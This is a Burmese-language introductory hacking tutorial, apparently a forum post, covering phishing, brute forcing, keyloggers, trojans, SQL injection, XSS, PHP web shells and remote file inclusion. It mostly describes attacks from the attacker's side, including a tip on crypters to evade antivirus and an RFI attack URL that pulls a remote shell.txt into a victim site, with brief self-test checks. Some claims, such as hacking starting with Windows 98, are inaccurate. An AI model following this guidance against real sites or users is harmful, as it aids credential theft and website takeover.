Introduction
ကျွန်တော်တို့ Website တွေ Forum တွေမှာ တွေ့နေရတာ လူတွေ မေးနေကြတာတွေထဲက အများစုကတော့ အီးမေးလ်တစ်ခုကို ဘယ်လို HACK မလဲ ၊ သူ့ password ကို ဘယ်လိုသိအောင်လုပ်မလဲ ၊website တစ်ခုကို ဘယ်လို attack လုပ်မလဲ ဆိုတာတွေပါ ၊ ဒီ tutorial လေးကတော့ သင့်ကို HACK တစ်ခုရဲ့ အခြေခံသဘောတရားကို နားလည်အောင် အထောက်အကူပြုပါလိမ့်မယ် ၊နောက်ပြီး အဲလို attacker တွေရဲ့ ရန်ကနေ ဘယ်လိုကာကွယ်ရမလဲ ဆိုတာတွေကို ရှင်းပြသွားပါမယ် ။
Background
Hacking ဆိုတာကတော့ ဟိုး Window 98 စကတည်း က ပေါ်ပေါက်လာခဲ့တာပါ။ Hacking ဆိုတာကတော့ အခြေခံအားဖြင့် ကွန်ပြူတာစနစ်ရဲ့ ဂယ်ပေါက်ကို ရှာတာ၊ နောက် information အချက်တစ်ခုရဲ့ အားနည်းချက်ကို ရှာတာ ဖြစ်ပါတယ် ၊ အဲဒီကနေ attacker ဟာ အဲဒီလူရဲ့ Critical information တွေဖြစ်တဲ့ password တို့ credit card detail တွေကို သိအောင်လုပ်သွားတာပါပဲ ၊
Initialization
အရင်ဆုံး Hacking ကို ချုပ်ကြည့်မယ်ဆိုရင် အဓိက နှစ်ပိုင်း ရှိပါတယ်။
၁။ Email or user information
၂။Web based hacking
Email or user information
အခုခေတ်မှာ email password ,credit card information တို့အတွက် အောက်ပါနည်းလမ်းတွေကို အသုံးများပါတယ်။
၁။Phishing
၂။Brute Forcing
၃။Keylogging
၄။Trojans
Phishing(webpage အတုဖြင့်တိုက်ခိုက်ခြင်း)
Phishing ကတော့ အခြေခံအားဖြင့် အများစုကို တိုက်ခိုက်ဖို့ အတွက်သုံးပါတယ် ။ ဒီနည်းနဲ့ တိုက်ခိုက်ဖို့ အတွက် hacker ဟာ Yahoo တို့ Gmail တို့ နဲ့ အပေါ်ယံ သွင်ပြင်ချင်း ဆင်တူတဲ့ website တစ်ခုကို ရေးပါတယ် ပြီးတဲ့ အခါမှာ အဲဒီ အတုအယောင် webpage ကို သူတို့ရဲ့ ကိုယ်ပိုင် server မှာတင်ပါတယ်။ ပြီးရင် အဲဒီ website link ကို user များဆီကို ဖြန့်ပါတယ် ..(Fwd mail နဲ့ ဖြစ်ဖြစ် forum တစ်ခုခုမှာ post တင်ပြီးဖြစ်ဖြစ် ဖြန့်ပါတယ် ) user တွေက အဲဒီ webpage ကို ဖွင့်လိုက်မယ် ၊ user တွေရဲ့စိတ်ထဲ မှာ တကယ့် Gmail Yahoo webpage လို့ ပဲ ထင်နေပြီးတော့ သူတို့ရဲ့ username နဲ့ password ကို ယုံယုံကြည်ကြည်ရိုက်ထည့်လိုက်မယ် ဆိုရင် အဲဒါတွေဟာ attacker တွေဆီကို ရောက်သွားပြီ ဖြစ်ပါတယ်။ ဒီနည်းကတော့ hacking လောကကို ၀င်ဖို့ ကြိုးစားနေတဲ့ သူများ အများဆုံးအသုံးပြုကြတဲ့နည်းဖြစ်ပါတယ်။
မကောင်းကျိုးများ
မကောင်းတာတစ်ခုကတော့ user ဟာ အင်တာနက်အကြောင်းကို အနည်းငယ်မျှသိ ရုံနဲဲ့ phishing attack ကို ရှောင်နိုင်ပါတယ်။ user ဟာ website URL address ကို ကြည့်ရုံနဲ့ ဒီ website ဟာ အစစ်ဟုတ်မဟုတ် သိနိုင်ပါတယ်။
Brute Forcing
Brute Forcer ကတော့ cracker program တစ်ခုပါပဲ ။hack ချင်တဲ့ username ကို ထည့်ပြီး သူ့ရဲ့ password ကိုမှန်အောင် ဖော်ထုတ်တဲ့ နည်းဖြစ်ပါတယ်။ ဒီမှာ hacker ဟာသူဖြစ်နိုင်မယ်ထင်ရတဲ့ password များကို notepad မှာထည့်ပြီး တိုက်ကြည့်တာဖြစ်ပါတယ်။
မကောင်းကျိုးများ
brute attack ဟာတခါတရံမှာ အချိန်တော်တော်ကြာတတ်ပါတယ်။ အောင်မြင် နိုင်တယ်လို့ သေချာပြောလို့ မရပါဘူး ။ နောက်ပြီး အခုခေတ်မှာ user တော်တော်များများဟာ alpha-numeric-symbol တွဲထားတဲ့ password တွေကို သုံးလာတဲ့ အတွက် brutefocer အတွက် hack ဖို့ရာ အတော်ခက်ခဲသွားပါပြီ။ လူသုံးများသော website များဖြစ်တဲ့ Yahoo Google စတဲ့ website များတွင်လည်း brute attack ကို ကာကွယ်ဖို့ login password ၃ ခါမှားလျှင် “image captcha” ဖမ်းပေးရတဲ့ နည်းလမ်းများကို သုံးလာကြပါပြီ။ (image captcha=check the letter in the picture and type them in text box)
Keylogging
Keylogger ဆိုတာ server တစ်ခုကို ဖန်တီးပေးတဲ့ program လေးတစ်ခုပါ။user ဟာ အဲဒီ program လေးကို click လိုက်တာနဲ့ ကိစ္စပြီးသွားပါပြီ ။ဒါကတော့ user တွေကို hack နိုင်ဖို့ အဖြစ်နိုင်ဆုံးနည်း တစ်ခုပါပဲ။ user တွေဟာ Keylogger ကို သူတို့ ကိုယ်တိုင် သူတို့ ရဲ့ computer မှာ install လုပ်ပြီဆိုတာနဲ့ keylogger ဟာ keyboard ကနေ ရိုက်သမျှ စာတွေကို record လုပ်ပြီး hacker ဆီကို တိုက်ရိုက်ပို့ မှာဖြစ်ပါတယ်။ ပို့တဲ့နည်းတွေကတော့ FTP,Email,Messenger စသည်ဖြင့်ရှိပါတယ်။ ကျွန်တော့်အတွက်ကတော့ ဒါဟာ user တွေဆီကနေ information ရယူဖို့ အလွယ်ဆုံးလို့ပြောချင်ပါတယ်။ software မှန်သမျှကို ယုံကြည်ရမှ run ဖို့သင့်ပါတယ်။ ကိုယ့်ဆီက information hack မယ့်သူရဲ့ hacking software ကို ကိုကိုယ်တိုင် install မလုပ်မိဖို့ လိုအပ်ပါတယ်။ freeware shareware ဆိုတိုင်းလဲ ယုံကြည်ရတာမဟုတ်ပါဘူး။
မကောင်းကျိုးများ
အကယ်လို့ user ဟာ အဲဒီ keylogger ကိုလက်ခံမိရင်တောင်မှ antivirus တွေဟာ detect ဖြစ်ပါတယ်။ဒါကြောင့် အဲဒါ install လုပ်ဖို့ user တွေကနေ သူတို့ရဲ့ antivirus ကို disable လုပ်ထားရမှာဖြစ်ပါတယ်။ နောက်ပြီးတခါတရံ မှာ message ပို့တာကို window firewall ရဲ့ block ခြင်းခံရတတ်ပါတယ်။Tips: cypters လို့ ခေါ်တဲ့ program လေးတွေကတော့ attacker ရဲ့ server program လေးတွေကို antivirus တွေကနေ detect မလုပ်နိုင်အောင် ကာကွယ်ပေးနိုင်ပါတယ်။
Trojans
Trojans တွေကတော့ keylogger တွေလိုပါပဲ။ Trojans တွေဟာ keylogger တွေလိုပဲ keyboard logs တွေကို attacker တွေဆီကို send နိုင်ပါတယ်။ နောက်တစ်ခုကတော့ Trojans တွေဟာ attacker တွေကို user ရဲ့ ကွန်ပြူတာကို ထိန်းချုပ်နိုင်အောင် ပြုလုပ်ပေးနိုင်ပါတယ်။တစ်ချို့ဆို user ရဲ့ ကွန်ပြူတာက CDROM တွေကို တောင်အသွင်းအထုတ် ပြုလုပ်နိုင်ပါတယ်။
မကောင်းကျိုးများ
keylogger နဲ့ အတူတူပါပဲ
WEB Hacking
WEB hacking မှာတော့ အများအားဖြင့် ၄ မျိုးရှိပါတယ်။
၁။SQL injection
၂။XSS
၃။Shells
၄။RFI
၅။ နောက်ထပ်အချို့ရှိပါသေးတယ်။ဒါပေမယ့် ရှင်းပြဖို့ အလွန်များပြားပါတယ်။
SQL injection: အခုခေတ် website အများစုဟာသူတို့ဆီကို user တစ်ယောက် register လုပ်လာပြီဆိုရင် သူတို့ရဲ့ username များနဲ့ password များကို (encrypted လုပ်ပြီး ) ထိန်းသိမ်းဖို့အတွက် SQL database ကို အသုံးများပါတယ်။website ဟာ database ဆီကို user login ၀င်တိုင်းမှာ password ကို validate လုပ်ဖို့အတွက် request ပို့ပေးရပါတယ်။ အကယ်လို့ မှန်ရင် website ဟာ user ကို access လုပ်ပေးပြီး မှားခဲ့ရင် error ပေးပါမယ်။ အခြေခံကတော့ အဲဒီပို့လိုက်တဲ့ request မှာ code တွေကို ထည့်သွင်းလိုက်ပြီး database မှာရှိတဲ့ information ကို တခြားတနေရာသို့ ပို့ပေးစေခြင်းဖြစ်ပါတယ်။ အကျယ်တဝင့်ရှင်းပြဖို့ ဒီမှာ မလွယ်ပါဘူး။ အကယ်လို့ ကိုယ့် website ကို hack ခံရ မခံရ ကို စစ်ဖို့
သင့်ရဲ့ website URL ပါ
yoursite.com/index.php?id=545
အဲဒါရဲ့ နောက်ဆုံးမှာ အောက်ပါအတိုင်းဖြည့်လိုက်ပါ
yoursite.com/index.php?id=545’
XSS: XSS ကလည်း website များကို hack တဲ့နေရာမှာ ကောင်းတဲ့ နည်းတစ်ခုပါပဲ။ အကယ်လို့ website /forum တစ်ခုဟာ html post တစ်ခုခု ကို တင်ခွင့်ပြုထားမယ်ဆိုရင် hacker ဟာ script တစ်ခုကို post တင်လိုက်ပါမယ်။ user တစ်ယောက်ဟာ အဲဒီ script webpage ကို ဖွင့်လိုက်ရုံနဲ့ script ဟာ user browser cookies တွေကို hacker ဆီသို့ ပို့ပေးလိုက်မှာဖြစ်ပါတယ်။ ဒီလိုနဲ့ hacker ဟာ အဲဒီ user နာမည်နဲ့ login ၀င်နိုင်တော့မှာ ဖြစ်ပါတယ် ။
Shells: Shell ဆိုတာကတော့ မလိုလားအပ်တဲ့ .php script တွေပါ။ ဒီမှာလုပ်ရမှာက အရင်ဆုံး avatars တို့ recepie တို့ ticks တို့ feedbacks တို့ ကို upload တင်နိုင်တဲ့ website/ forum တို့ကိုအရင်ရှာရပါမယ်။ ပြီးရင် အဲဒီ forum မှာ ကိုယ့်ရဲ့ shell file လေးကို အဲဒီမှာ upload လုပ်ပါမယ်။ ပြီးရင် URL bar ကနေပြီး အဲဒီ file လေးကို open လိုက်တာနဲ့ အဲဒီ website upload လုပ်ထားတဲ့ webhosting ရဲ့ FTP account တစ်ခုလုံးကို မြင်တွေ့ရမှာ ဖြစ်ပါတယ်။ ဒါဆိုရင်တော့ attacker ဟာ အဲဒီ website ရဲ့ index page အပါအဝင် ကြိုက်တာကို edit လုပ်ခွင့်ရရှိသွားမှာ ဖြစ်ပါတယ်။ (deface လို့လည်းခေါ်ပါတယ်)
RFI: RFI (remote file inclusion) ဒီနည်းမှာ attacker ဟာ သူ့ရဲ့ php script code တွေကို သင့်ရဲ့ php application ထဲကို ကြိုးစားပြီးထည့်သွင်းရပါတယ်။ attacker က အောင်မြင်စွာ ထည့်သွင်းနိုင်ပြီဆိုတာနဲ့ attacker ဟာ user ရဲ့ webserver ကို ထိန်းချုပ်ခွင့် ရသွားမှာဖြစ်ပါတယ်။ ဒီမှာ Shell ကို အသုံးပြုပါတယ်။ ဥပမာ attacker ဟာ သူ့ရဲ့ code ကို ဒီမှာ upload ထားပြီ ဆိုပါစို့။
yoursite.com/shell.txt
hack ချင်တဲ့ webpage address မှာ
victimssite.com/index.php?page=yoursite.com/shell.txt
ဒါဆိုရင် user ရဲ့ website FTP server က attacker ကို edit လုပ်ခွင့်ပေးလိုက်ပြီဖြစ်ပါတယ်။
သင့် webpage ကို အဲလိုတိုက်ခိုက်ခံရသလား စစ်ချင်ရင်တော့
သင့် webpage url :
yoursite.com/index.php?id=545
နောက်ဆုံးမှာထပ်ဖြည့်လိုက်ပါ
yoursite.com/index.php?id=http://www.google.com
အကယ်လို့ google page ဟာ သင့် webpage ထဲပါလာရင် သင့် website ဟာတိုက်ခိုက်ခံ နေရပြီလို့ မှတ်လို့ရပါတယ်
more info
http://cyberwarez.info/forum/tutorials-manuals-tricks/545568-complete-hacking-guide.html